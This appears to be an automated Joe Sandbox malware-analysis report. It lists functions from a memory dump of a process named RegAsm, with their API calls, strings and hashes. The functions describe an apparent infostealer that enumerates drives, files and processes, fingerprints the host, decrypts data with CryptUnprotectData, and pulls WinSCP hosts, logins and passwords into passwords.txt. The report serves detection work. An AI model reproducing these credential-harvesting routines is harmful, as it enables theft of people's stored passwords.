Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: YHI;$delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-2169725648
Opcode ID: 2cf8cfc84cda5c85f2883e1b4af1562e645fefd222ac2438fc35402dc5ddcbc0
Instruction ID: 1bb3bbbc911a85c5f196950be838c7acd03eebb6570062e4bb551b6d47777c18
Opcode Fuzzy Hash: 2cf8cfc84cda5c85f2883e1b4af1562e645fefd222ac2438fc35402dc5ddcbc0
Instruction Fuzzy Hash: B8F1CBB1A043519FDB148F3CC885B1A77E8BB94746F88492DF84AC72C1D735DA89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0041433D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414342
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004143A4
memset.MSVCRT ref: 004143C3
GetDriveTypeA.KERNEL32(?), ref: 004143CC
lstrcpy.KERNEL32(?,00000000), ref: 004143EC
lstrcpy.KERNEL32(?,00000000), ref: 0041440A

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00413F80: _EH_prolog.MSVCRT ref: 00413F85
Part of subcall function 00413F80: wsprintfA.USER32 ref: 00413FAB
Part of subcall function 00413F80: FindFirstFileA.KERNEL32(?,?), ref: 00413FC2
Part of subcall function 00413F80: memset.MSVCRT ref: 00413FD9
Part of subcall function 00413F80: memset.MSVCRT ref: 00413FE7
Part of subcall function 00413F80: StrCmpCA.SHLWAPI(?,00424758), ref: 00414005
Part of subcall function 00413F80: StrCmpCA.SHLWAPI(?,0042475C), ref: 0041401F
Part of subcall function 00413F80: wsprintfA.USER32 ref: 00414043
Part of subcall function 00413F80: StrCmpCA.SHLWAPI(?,0042446F), ref: 00414054
Part of subcall function 00413F80: wsprintfA.USER32 ref: 0041407A
Part of subcall function 00413F80: memset.MSVCRT ref: 004140A0
Part of subcall function 00413F80: lstrcat.KERNEL32(?,?), ref: 004140B2
Part of subcall function 00413F80: strtok_s.MSVCRT ref: 004140EB
Part of subcall function 00413F80: memset.MSVCRT ref: 00414100
Part of subcall function 00413F80: lstrcat.KERNEL32(?,?), ref: 00414115

lstrcpy.KERNEL32(?,00000000), ref: 0041442D
lstrlen.KERNEL32(?), ref: 00414492

Strings

*%DRIVE_FIXED%*, xrefs: 00414356
%DRIVE_FIXED%, xrefs: 00414411
*%DRIVE_REMOVABLE%*, xrefs: 00414379
%DRIVE_REMOVABLE%, xrefs: 004143F3

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2879972474-147700698
Opcode ID: 9a0e78cfb2548f6f869585a3d980dec9b95ed49726ef5ca9c3736a71f5382786
Instruction ID: 58c7e2158a2ed08aedab02b254e64c876912a71edb7371f0c145f83077c21ff0
Opcode Fuzzy Hash: 9a0e78cfb2548f6f869585a3d980dec9b95ed49726ef5ca9c3736a71f5382786
Instruction Fuzzy Hash: 8F519571900148BBDF20EFA1DC85EEF3B6DEF45348F50082EB519A2192EB385B59CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004011D9 Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 733fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004011DE

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042037C,?,?,?,00420378,?,?,00000000,?,00000000), ref: 00401423
StrCmpCA.SHLWAPI(?,00420380), ref: 00401441
StrCmpCA.SHLWAPI(?,00420384), ref: 0040145B
FindFirstFileA.KERNEL32(00000000,?,?,?,?,00420390,?,?,?,0042038C,?,?,?,00420388,?,?), ref: 00401587

Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,00420394), ref: 0040185E
FindClose.KERNEL32(00000000,?,?,?,?,?,00420394), ref: 0040186D
FindNextFileA.KERNEL32(?,?), ref: 00401BB5
FindClose.KERNEL32(?), ref: 00401BC6

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778

Part of subcall function 00406138: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061C3

Part of subcall function 00412F70: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00412FF9

Strings

\*.*, xrefs: 00401326
5, xrefs: 00401B8A

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: 5$\*.*
API String ID: 40499504-3045658031
Opcode ID: 6acfb0b8a330886f3c07ebc876d29f0257ca2d7e1a4ad477c629b61ccec8925a
Instruction ID: 8fe853fa20658960ce76e94df6792b9ea689fe582a5c2dc8aed586a8de72a33b
Opcode Fuzzy Hash: 6acfb0b8a330886f3c07ebc876d29f0257ca2d7e1a4ad477c629b61ccec8925a
Instruction Fuzzy Hash: 6B626F3180428CEADB05EBE6C955BDDBBB86F18308F5444AEF445732C2DB781B58CB26

Uniqueness

Uniqueness Score: -1.00%

Function 0040E76B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E770

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

GetKeyboardLayoutList.USER32(00000000,00000000,004241B7,00000000,?,00000000), ref: 0040E7A2
LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040E7B0
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040E7BB
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040E7E5

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

LocalFree.KERNEL32(?), ref: 0040E889

Strings

/ , xrefs: 0040E7F3

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 2868853201-4001269591
Opcode ID: 1a3b5d77612882ea5794f2b142a1218d0ae6da40df0d21af66489997f1f709a1
Instruction ID: 5242bb83f7db48a209f353afb88fc463f83896732aa90f82399ba923e9b9454b
Opcode Fuzzy Hash: 1a3b5d77612882ea5794f2b142a1218d0ae6da40df0d21af66489997f1f709a1
Instruction Fuzzy Hash: A9312C72900118EEDB04EFE6D885AEEBBB8FF48304F14446EF505B3281C7785A95CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC40 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FC45
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FC6B
Process32First.KERNEL32(00000000,00000128), ref: 0040FC7B
Process32Next.KERNEL32(00000000,00000128), ref: 0040FC8D
StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0040FCA1
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FCB4

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
String ID:
API String ID: 186290926-0
Opcode ID: 270f674b6bd053faef81da5913a7ace93250f6d8cd68a817cd281ad159d8f204
Instruction ID: fa4158ad643b6a63ca4e836918e2f21684de1794b771a929b0a92a8893ecefeb
Opcode Fuzzy Hash: 270f674b6bd053faef81da5913a7ace93250f6d8cd68a817cd281ad159d8f204
Instruction Fuzzy Hash: B0019E71900418ABDB219F55EC49ADEBBBAFF81310F104076F801F2240D7788F45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1A8 Relevance: 7.6, APIs: 5, Instructions: 62commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00424C98,00000000,00000001,00424388,00000000,?), ref: 0040F1C8
SysAllocString.OLEAUT32(00000000), ref: 0040F1D6
_wtoi64.MSVCRT ref: 0040F218
SysFreeString.OLEAUT32(?), ref: 0040F22D
SysFreeString.OLEAUT32(00000000), ref: 0040F230

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: d4edb80c7c273018b9d901076822336c36bbc8e5ec39c678b9848d0cf7c73554
Instruction ID: 36e1fe214f56445511a06ce0c9af4fa7ab1d6e2d6c38daba9a39b14b96fb5745
Opcode Fuzzy Hash: d4edb80c7c273018b9d901076822336c36bbc8e5ec39c678b9848d0cf7c73554
Instruction Fuzzy Hash: E3118134B04208BFDB10DFA5D848B9EBFB9EF85714F1480B9E804EB251CB769506CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040E651 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,HAL9TH,?,00401063,JohnDoe,00415B49), ref: 0040E65D
HeapAlloc.KERNEL32(00000000,?,00401063,JohnDoe,00415B49), ref: 0040E664
GetUserNameA.ADVAPI32(00000000,?), ref: 0040E678

Strings

HAL9TH, xrefs: 0040E654

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID: HAL9TH
API String ID: 1206570057-1811034163
Opcode ID: dad54f3eeb76aaf9ab3917e628952378ff3586baf3244f5a3df97a0ddb187189
Instruction ID: 3b6bb86c2aa7e6c860c7c69a7c5b7b6065036db9af3dab9ac7174578770e79df
Opcode Fuzzy Hash: dad54f3eeb76aaf9ab3917e628952378ff3586baf3244f5a3df97a0ddb187189
Instruction Fuzzy Hash: 75D05EF6700204BFE7109BA5ED0DF9ABAFCEB84755F400065FB02D2291DAF099018A34

Uniqueness

Uniqueness Score: -1.00%

Function 0040E718 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ), ref: 0040E729
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E730
GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042454C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040E73F
wsprintfA.USER32 ref: 0040E75D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 2970ad804210b27692d63d95c1c219e29d2a4f61a4fb4e25faef3d96918d710d
Instruction ID: ddcf64704f1bc3c6141f033c01d982c90cc94944e95df457e6d4af9f879a5c79
Opcode Fuzzy Hash: 2970ad804210b27692d63d95c1c219e29d2a4f61a4fb4e25faef3d96918d710d
Instruction Fuzzy Hash: 36E09271700320BBDB1067B8FC4EF9A3B6EDB41725F100252FA15E21D0E6749D5487E6

Uniqueness

Uniqueness Score: -1.00%

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406275
LocalAlloc.KERNEL32(00000040,?,?), ref: 0040628D
LocalFree.KERNEL32(?), ref: 004062AB

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: cadf5577c9b9691b71ad68239c0d5a22a5f3d8c6918a2dc9e96d3e60350b608e
Instruction ID: afe4829b9d1edcfe5df11625f36b51efeaebfb5f47dcb0a2a1b211f2eb5da05d
Opcode Fuzzy Hash: cadf5577c9b9691b71ad68239c0d5a22a5f3d8c6918a2dc9e96d3e60350b608e
Instruction Fuzzy Hash: AF011DB6900218AFDF10EFE8DC448EEBBB9FF48600F10056AF945E7250D37599508B50

Uniqueness

Uniqueness Score: -1.00%

Function 0040E907 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 0040E914
wsprintfA.USER32 ref: 0040E929

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 7294e20f52773795ff6104e9a9063163d126c4ee991cbe2967d73750617d30e0
Instruction ID: 30066c338acff39604fbe4a50ee4d830962821b77274f0eb823570a350decf8b
Opcode Fuzzy Hash: 7294e20f52773795ff6104e9a9063163d126c4ee991cbe2967d73750617d30e0
Instruction Fuzzy Hash: 0AD05EB180021DDBCF10DBA0FC8AE8977BDAB04308F4001A1AB00F2090E374E62E8BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFE9 Relevance: 89.6, APIs: 37, Strings: 14, Instructions: 318
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040AFEE
memset.MSVCRT ref: 0040B017
memset.MSVCRT ref: 0040B037
memset.MSVCRT ref: 0040B04B
memset.MSVCRT ref: 0040B05F
memset.MSVCRT ref: 0040B06E
memset.MSVCRT ref: 0040B07C
memset.MSVCRT ref: 0040B08D
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040B0B5
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040B0DD
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040B12C
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040B149
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040B15D
HeapAlloc.KERNEL32(00000000), ref: 0040B164
lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040B175
lstrcat.KERNEL32(?,Host: ), ref: 0040B183
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?), ref: 0040B1A6
lstrcat.KERNEL32(?,?), ref: 0040B1B2
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040B1DC
lstrcat.KERNEL32(?,00000000), ref: 0040B1FF
lstrcat.KERNEL32(?,:22), ref: 0040B21A
lstrcat.KERNEL32(?,00423F5C), ref: 0040B228
lstrcat.KERNEL32(?,Login: ), ref: 0040B236
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?), ref: 0040B259
lstrcat.KERNEL32(?,?), ref: 0040B265
lstrcat.KERNEL32(?,00423F74), ref: 0040B273
RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?), ref: 0040B296
lstrcat.KERNEL32(?,Password: ), ref: 0040B2A0
StrCmpCA.SHLWAPI(?,00423C4E), ref: 0040B2B2
lstrcat.KERNEL32(?,00000000), ref: 0040B2EC
lstrcat.KERNEL32(?,00423F90), ref: 0040B305
lstrcat.KERNEL32(?,00423F94), ref: 0040B313
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040B338
memset.MSVCRT ref: 0040B349
memset.MSVCRT ref: 0040B357
lstrlen.KERNEL32(?), ref: 0040B36E

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

memset.MSVCRT ref: 0040B3C0

Strings

PortNumber, xrefs: 0040B1C6
Password: , xrefs: 0040B298
UseMasterPassword, xrefs: 0040B0D0
Soft: WinSCP, xrefs: 0040B16D
:22, xrefs: 0040B212
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040B0A2
HostName, xrefs: 0040B197
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040B122
Security, xrefs: 0040B0D5
Login: , xrefs: 0040B22E
Password, xrefs: 0040B287
Host: , xrefs: 0040B17B
UserName, xrefs: 0040B24A
passwords.txt, xrefs: 0040B380

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

